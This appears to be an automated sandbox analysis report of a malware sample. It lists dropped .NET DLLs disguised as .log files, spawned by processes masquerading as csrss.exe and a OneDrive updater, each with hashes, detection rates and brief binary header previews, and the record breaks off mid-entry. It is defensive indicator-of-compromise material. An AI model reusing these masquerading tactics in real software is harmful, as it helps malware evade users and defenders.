SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PlXlrHgd.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QEZfGaYD.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\SrUDuXuD.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UJJDbPGV.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WTfEbhlW.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\WmaEvGYQ.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WoNdSLwd.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\XVEvJLRT.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\XbGmIAmd.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\YUqBbklL.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\ZXUBvZWR.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\caoTeAzl.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\dVzTSQDZ.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fxnuLaBD.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hJaCsdsL.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hyzrKdBs.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lJHjOcES.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\lYJBZlMp.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ntqjPtDe.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\oJeKCcyH.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
